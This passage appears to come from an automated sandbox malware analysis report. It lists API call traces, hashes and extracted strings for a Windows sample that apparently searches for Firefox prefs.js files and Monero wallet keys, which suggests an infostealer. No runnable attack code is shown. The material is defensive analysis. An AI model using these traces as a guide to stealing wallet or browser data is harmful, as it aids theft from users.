                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 2a8e7f7ca5e400268882a016fd2513f2a47b65804b28db448f803163abc475f6
                        • Instruction ID: f894d8606b9df267ca65ec7e07d6f60b153d2d9a27ce549a96823710375f1b38
                        • Opcode Fuzzy Hash: 2a8e7f7ca5e400268882a016fd2513f2a47b65804b28db448f803163abc475f6
                        • Instruction Fuzzy Hash: B6B17771D112489BDB64FFA1DC91AEE737BAF54300F0185ADA40A57181EF306B49CF96
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006F510C,?,?,?,006F51B4,?,?,00000000,?,00000000), ref: 006D1923
                        • StrCmpCA.SHLWAPI(?,006F525C), ref: 006D1973
                        • StrCmpCA.SHLWAPI(?,006F5304), ref: 006D1989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 006D1D40
                        • DeleteFileA.KERNEL32(00000000), ref: 006D1DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006D1E20
                        • FindClose.KERNEL32(000000FF), ref: 006D1E32
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                        • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 0a6294e986e2ca87d1747d2e57b3d82e31ab9d6fe63a9e751c728ed4696dedf8
                        • Instruction ID: 0102ce9486922eccd87c8bfd275f52374bc3742958c49f9fedc81a7442dc4f85
                        • Opcode Fuzzy Hash: 0a6294e986e2ca87d1747d2e57b3d82e31ab9d6fe63a9e751c728ed4696dedf8
                        • Instruction Fuzzy Hash: F3125171912258ABDB55FBA1CC96EEE733AAF14300F41419DB10A66091EF307F89CFA5
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006F0C2E), ref: 006DDE5E
                        • StrCmpCA.SHLWAPI(?,006F14C8), ref: 006DDEAE
                        • StrCmpCA.SHLWAPI(?,006F14CC), ref: 006DDEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DE3E0
                        • FindClose.KERNEL32(000000FF), ref: 006DE3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: b15c4a093c3e08152f96d7a021259ddecf140a661d70e9d614f80c20af2e3743
                        • Instruction ID: cadbc7b5d1e2bc56846db3abbebea508a4e0dcbdfe221877f6e7211970c2e062
                        • Opcode Fuzzy Hash: b15c4a093c3e08152f96d7a021259ddecf140a661d70e9d614f80c20af2e3743
                        • Instruction Fuzzy Hash: 1BF1E0718262589ADB65FBA1CC95EEE733ABF54300F4141DDA40A62091EF307F4ACF69
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                          • Part of subcall function 006EA920: lstrcpy.KERNEL32(00000000,?), ref: 006EA972
                          • Part of subcall function 006EA920: lstrcat.KERNEL32(00000000), ref: 006EA982
                          • Part of subcall function 006EA9B0: lstrlen.KERNEL32(?,00E491C8,?,\Monero\wallet.keys,006F0E17), ref: 006EA9C5
                          • Part of subcall function 006EA9B0: lstrcpy.KERNEL32(00000000), ref: 006EAA04
                          • Part of subcall function 006EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006EAA12
                          • Part of subcall function 006EA8A0: lstrcpy.KERNEL32(?,006F0E17), ref: 006EA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006F14B0,006F0C2A), ref: 006DDAEB
                        • StrCmpCA.SHLWAPI(?,006F14B4), ref: 006DDB33
                        • StrCmpCA.SHLWAPI(?,006F14B8), ref: 006DDB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006DDDCC
                        • FindClose.KERNEL32(000000FF), ref: 006DDDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 058281a3f760ea27f7579f5a6f0fabbe59993f0229076e7483586366650517d6
                        • Instruction ID: c125bbd9e12fe9a11cb23dc015070f69587f6a3646b9e1c71e185f85e3587f85
                        • Opcode Fuzzy Hash: 058281a3f760ea27f7579f5a6f0fabbe59993f0229076e7483586366650517d6
                        • Instruction Fuzzy Hash: 1A918472911204A7DF54FBB1EC969FE737FAF84300F01865DB90696181EE34AB09CB96
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 'x?$.y~-$5w$ZK{_$Znow$f6-9$vxo$zlM*$WO
                        • API String ID: 0-2992123815
                        • Opcode ID: 2249fec7f07e7939801dad3ee8b62d443df993836ef445807aeb8e3da6bb61f6
                        • Instruction ID: 2f454846fb0063b12b93219f10df0e37da675e833a04edf0f48a5637e5fd49b6
                        • Opcode Fuzzy Hash: 2249fec7f07e7939801dad3ee8b62d443df993836ef445807aeb8e3da6bb61f6
                        • Instruction Fuzzy Hash: 61B2E5F360C204AFE3046E29EC8567AFBE9EF94720F16893DEAC4C3744E67558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 2_$$)]{$?Bo$DJFH$IyU$Zu^Q$`SvI$a^uv$u}_
                        • API String ID: 0-1183427295
                        • Opcode ID: 38a97943fc73f9a6ff953fa816c8e56b331cbc4ae67618c3e96ad87138d75250
                        • Instruction ID: 474c51faa20335c7d53bddf1443ba9f233accfb87860c94e509737f233b4c182
                        • Opcode Fuzzy Hash: 38a97943fc73f9a6ff953fa816c8e56b331cbc4ae67618c3e96ad87138d75250
                        • Instruction Fuzzy Hash: 8FB2D5F360C2049FE304AE29EC8567AFBE9EF94720F1A893DE6C4C7744E63558418696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: }_$?l_7$Fj{$R.b}$XF>$Z6_${&v$|"3
                        • API String ID: 0-1248171081
                        • Opcode ID: 33fb4aafdad2a402acc931e0915810272ac2c0e3feb180e53bbeffd6875d7255
                        • Instruction ID: 15eeaf0f3fcaa35373bd3172c4edd4802aefe8774af0812758a2cf25dc631938
                        • Opcode Fuzzy Hash: 33fb4aafdad2a402acc931e0915810272ac2c0e3feb180e53bbeffd6875d7255
                        • Instruction Fuzzy Hash: FBB2D4F360C2049FE704AE29EC8577ABBE5EB94320F16893DEAC4C7744EA3558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;y]^$;y]^$Io"!$ULSo$a;^$rJS7$rw/p$w1
                        • API String ID: 0-2864300429
                        • Opcode ID: 40b46525e8d6b2528abef7a04fca1107af7ff1cc58075cd17eb963b154917065
                        • Instruction ID: 4d64db3493ca99904cc784aeba733c6b82de4876322cdc9cb787522feb38c193
                        • Opcode Fuzzy Hash: 40b46525e8d6b2528abef7a04fca1107af7ff1cc58075cd17eb963b154917065
                        • Instruction Fuzzy Hash: C7A218F360C2049FE3046E2DEC8567ABBE9EFD4720F1A863DE6C4C7744E63598418696
                        APIs
                          • Part of subcall function 006EA740: lstrcpy.KERNEL32(006F0E17,00000000), ref: 006EA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,006F05AF), ref: 006E7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006E7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 006E7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006E7C62
                        • LocalFree.KERNEL32(00000000), ref: 006E7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 8b46304502c5eee6c4d0daa3457a49686c354f976986e1fbd839f89039337e4d
                        • Instruction ID: 4bc7b2597e36ed32788fedf04b5117e420e0f56c6b704709cfbf76a71eaaa065
                        • Opcode Fuzzy Hash: 8b46304502c5eee6c4d0daa3457a49686c354f976986e1fbd839f89039337e4d
                        • Instruction Fuzzy Hash: A4417E71912258ABDB64DB95DC89BEEB37AFF44700F2041D9E00962291DB342F86CFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: '+{w$22zq$3^w$O'[$S0{}$wE|]$}sz
                        • API String ID: 0-557880407
                        • Opcode ID: c89c4b8ce9725dca8c58bf760fcdf833f674af30e0802e9d2c4f06384939c868
                        • Instruction ID: 25bd668a4fbae3be01f16d895381efa8560df5d4e5753c6c47a67e36467cb006
                        • Opcode Fuzzy Hash: c89c4b8ce9725dca8c58bf760fcdf833f674af30e0802e9d2c4f06384939c868
                        • Instruction Fuzzy Hash: C8B207F360C604AFE3046E2DEC8567AFBE9EF94720F16862DE6C4C7744EA3558018696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: Ay?$2m?.$>$ds$@hon$Z6t$Zs~$};}/
                        • API String ID: 0-954932429
                        • Opcode ID: d92166e6cebd5946b1aad8c8a6babf03f801ea4674d1a2d2590de7ebee9bd769
                        • Instruction ID: 8bf615163b49dfea4caa87b3b48816f8e3c8a4f82c7f705a1fe075ab482c7947
                        • Opcode Fuzzy Hash: d92166e6cebd5946b1aad8c8a6babf03f801ea4674d1a2d2590de7ebee9bd769
                        • Instruction Fuzzy Hash: A9B25BF3A0C2149FE3046F2DEC8567ABBE9EF94720F1A463DEAC4D3744E67558018692
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1823433124.000000000092E000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                         • Associated: 00000000.00000002.1823209031.00000000006D0000.00000004.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.0000000000781000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000078D000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.00000000007B2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823219353.000000000091A000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000ABC000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000B9C000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC2000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BC9000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823433124.0000000000BD8000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823660450.0000000000BD9000.00000080.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823769729.0000000000D7B000.00000040.00000001.01000000.00000003.sdmp
                         • Associated: 00000000.00000002.1823782235.0000000000D7C000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
